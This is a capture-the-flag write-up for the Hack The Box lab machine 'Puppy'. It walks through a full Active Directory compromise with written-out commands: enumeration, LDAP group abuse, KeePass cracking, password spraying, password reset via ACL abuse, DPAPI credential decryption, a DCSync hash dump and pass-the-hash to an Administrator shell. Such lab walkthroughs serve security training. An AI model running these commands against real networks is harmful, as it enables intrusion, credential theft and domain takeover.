🐶 Puppy

🔍 1. Initial Enumeration – Nmap

I started with a full TCP service and OS scan using Nmap:

nmap -A -Pn -p- puppy.htb

Key ports identified:

• Kerberos (88), LDAP (389/3268), and SMB (445) — indicating a Windows Active Directory environment
• WinRM (5985) — later used for remote shell access
• NFS/RPC (2049, 111) and HTTPAPI (5985)

Nmap revealed the domain name: PUPPY.HTB, and the host is likely running Windows Server 2022.

---

📁 2. SMB Share Enumeration with Valid Credentials

Given credentials:

levi.james : KingofAkron2025!

I enumerated SMB shares with:

crackmapexec smb 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' --shares

🔒 Access to the DEV share was denied!

---

👥 3. Domain User Enumeration

To identify other users in the environment, I ran:

crackmapexec smb 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' --users

This revealed several valid domain users, including:

• adam.silver
• steph.cooper
• ant.edwards
• jamie.williams
• steph.cooper_adm

I saved these usernames into a users.txt file for later spraying.

---

🧠 4. Active Directory Enumeration with BloodHound

To analyze Active Directory permissions and relationships, I used BloodHound with the following command:

bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns 10.10.11.70

To make import easier into BloodHound GUI, I zipped the output:

zip bloodhound.zip *.json

---

🔎 5. BloodHound Analysis — Graph Relationships

After importing the bloodhound_results.json files into BloodHound, I observed the following privilege relationships for the user levi.james@puppy.htb.

Key findings from the visual graph:

• Membership: levi.james is a direct member of several groups including HR@PUPPY.HTB
• Privilege Escalation Opportunity: The HR@PUPPY.HTB group has GenericWrite privilege over the DEVELOPERS@PUPPY.HTB group
• Since levi.james is a member of HR@PUPPY.HTB, this grants the ability to modify membership of the DEVELOPERS group

---

🧬 6. Group Membership Abuse via LDAP — Adding to DEVELOPERS Group

I learned that levi.james had GenericWrite on the DEVELOPERS group.

To exploit this, I crafted an LDIF file to add levi.james to the group:

modify.ldif:

dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
changetype: modify
add: member
member: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB

Then ran:

ldapmodify -x -H ldap://10.10.11.70 -D "levi.james@puppy.htb" -w 'KingofAkron2025!' -f modify.ldif

This successfully added levi.james to the DEVELOPERS group.

LFG, now we have read permission!

Let's see what's inside the DEV share:

smbclient -U 'puppy.htb/levi.james%KingofAkron2025!' //10.10.11.70/DEV

I can see some suspicious files. Let's download them and hope they aren't viruses

recovery.kdbx is a KeePass database file likely contains stored credentials and it is encrypted

🔐 7. Cracking recovery.kdbx — KeePass Database

Since it was a .kdbx file (KeePass v4 format), the usual keepass2john tool didn't work:

keepass2john recovery.kdbx > recovery.hash
# Output: File version '40000' is currently not supported!

So I used an alternative tool: keepass4brute, which supports KeePass v4.

✅ Steps to crack:

wget https://github.com/r3nt0n/keepass4brute/raw/master/keepass4brute.sh
chmod +x keepass4brute.sh
sudo apt update && sudo apt install keepassxc # if you haven't installed this
./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt

After testing thousands of passwords, it eventually found the correct master password:

---

🧩 8. Accessing KeePass Database via GUI (KeePassXC)

Using the KeePassXC GUI, which provides a user-friendly interface to browse entries securely.

Steps:

1. I launched KeePassXC on my Kali machine: keepassxc
2. Opened the file: recovery.kdbx
3. When prompted, I entered the cracked master password: liverpool
4. Once unlocked, I browsed through the stored entries. The database contained several credentials — including usernames and passwords for domain accounts.

---

🔑 9. Extracted Credentials + Spray

From the KeePassXC GUI, I manually copied out the following recovered credentials:

• JamieLove2025!
• Antman2025!
• Steve2025!
• ILY2025!
• HJKL2025!

I saved these into a text file (passwords_spray.txt) and used them to conduct a password spray across known domain users:

crackmapexec smb 10.10.11.70 -u users.txt -p password_spray.txt --continue-on-success

🔎 10. BloodHound Analysis — Escalation via adam.silver

To uncover further privilege relationships and escalation paths, I ran BloodHound as the newly discovered user:

bloodhound-python -u 'ant.edwards' -p 'Antman2025!' -d puppy.htb -dc DC.PUPPY.HTB -c All -ns 10.10.11.70 -o bloodhound_ant

Then zipped the results for GUI import:

zip bloodhound_ant.zip bloodhound_ant/*.json

The graph revealed a clear and exploitable escalation path:

• ANT.EDWARDS@PUPPY.HTB is a member of the SENIOR DEVS@PUPPY.HTB group
• This group has GenericAll rights over ADAM.SILVER@PUPPY.HTB, which means full control — including the ability to reset the user's password
• Furthermore, adam.silver has CanPSRemote rights on DC.PUPPY.HTB — the Domain Controller
• This creates a direct escalation chain:

ant.edwards → GenericAll → adam.silver → CanPSRemote → Domain Controller

🎯 Game Plan

To exploit this path, I planned the following steps:

1. Use bloodyAD to reset the password for adam.silver
2. Ensure the account is enabled
3. Log in as adam.silver via WinRM
4. Use the access to run commands on the DC

✅ This is a textbook Privilege Escalation via ACL abuse + PSRemoting path.

🔧 11. ACL Abuse – Resetting adam.silver Password

Using bloodyAD, I reset the password for adam.silver:

bloodyAD -u ant.edwards -p 'Antman2025!' -d puppy.htb --dc-ip 10.10.11.70 set password adam.silver 'P@ssword123'

The password was successfully changed ✅.

---

🛑 12. Fixing STATUS_ACCOUNT_DISABLED

I attempted to login, but the account was disabled:

crackmapexec smb 10.10.11.70 -u 'adam.silver' -p 'P@ssword123' -d PUPPY.HTB
# Output: STATUS_ACCOUNT_DISABLED

To fix this, I removed the ACCOUNTDISABLE flag using:

bloodyAD --host 10.10.11.70 -d puppy.htb -u ant.edwards -p 'Antman2025!' remove uac adam.silver -f ACCOUNTDISABLE

---

✅ 13. Confirming Access with WinRM

After re-enabling the account, I confirmed that the credentials work and I had remote access:

crackmapexec winrm 10.10.11.70 -u 'adam.silver' -p 'P@ssword123' -d PUPPY.HTB
# Output: Pwn3d!

Then spawned a remote shell:

evil-winrm -i 10.10.11.70 -u 'adam.silver' -p 'P@ssword123'

---

🧾 14. Reading the user.txt Flag

Once inside, I navigated to the desktop and grabbed the flag:

cd C:\Users\adam.silver\Desktop
type user.txt

📈 15. Further BloodHound on adam.silver

To check for possible privilege escalation to Domain Admin, I ran BloodHound as adam.silver:

bloodhound-python -u 'adam.silver' -p 'P@ssword123' -d puppy.htb -dc DC.PUPPY.HTB -c All -ns 10.10.11.70 -o bloodhound_adam

Zipped the results:

zip bloodhound_adam.zip bloodhound_adam_*.json

Imported into BloodHound GUI, I searched for the shortest path to Domain Admin.

After uploading and analyzing the graph, I observed:

• adam.silver has CanPSRemote on DC.PUPPY.HTB — confirming remote PowerShell (WinRM) access to the Domain Controller
• steph.cooper is a member of ACCOUNT OPERATORS
• steph.cooper_adm is a member of the ADMINISTRATORS group
• Most importantly, steph.cooper_adm has GetChanges, GetChangesAll, and ReplicateDirectoryChanges rights on the domain — these permissions are required for a DCSync attack
• Therefore, escalating to steph.cooper_adm is the final step toward dumping domain credentials

This sets the stage for domain takeover using secretsdump.py after retrieving the credentials for steph.cooper_adm.

🛠 16. Gaining steph.cooper_adm Credentials (DPAPI Extraction)

*Evil-WinRM* PS C:\Backups> dir

    Directory: C:\Backups

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          3/8/2025   8:22 AM        4639546 site-backup-2024-12-30.zip

After downloading and extracting it locally, I found an interesting file:

nms-auth-config.xml.bak

Inside the file:

<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>

---

🔓 17. Extracting DPAPI Secrets from steph.cooper

I used Evil-WinRM to connect as steph.cooper and enumerate the user's DPAPI-protected secrets.

1. Identified the master key:

C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-...\
    └── 556a2412-1275-4ccf-b721-e6a0b4f90407

2. Found a DPAPI credential blob:

C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\
    └── C8D69EBE9A43E9DEBF6B5FBD48B521B9

3. Transferred both files using an Impacket SMB server, and decrypted them with:

# Decrypt masterkey
python3 dpapi.py masterkey -file 556a2412-... -password 'ChefSteph2025!' -sid S-1-5-21-...

# Decrypt credential
python3 dpapi.py credential -file C8D69EBE9... -key <decrypted_master_key>

---

🔓 18. DCSync Attack — Domain Takeover

After confirming the steph.cooper_adm credentials, I ran BloodHound again:

bloodhound-python -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!' -d puppy.htb -dc DC.PUPPY.HTB -c All -ns 10.10.11.70 -o bloodhound_admin

The graph confirmed: ✅ steph.cooper_adm has DCSync privileges.

Using secretsdump.py, I executed the DCSync attack:

secretsdump.py 'PUPPY.HTB/steph.cooper_adm:FivethChipOnItsWay2025!'@10.10.11.70

Successfully dumped domain hashes, including the Administrator NTLM hash:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::

---

⚡ 19. Final Pwn — Administrator Shell via WinRM

Logged in with the NT hash:

evil-winrm -i 10.10.11.70 -u 'Administrator' -H 'bb0edc15e49ceb4120c7bd7e6e65d75b'

Boom — Admin shell acquired.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

🏁 Rooted puppy.htb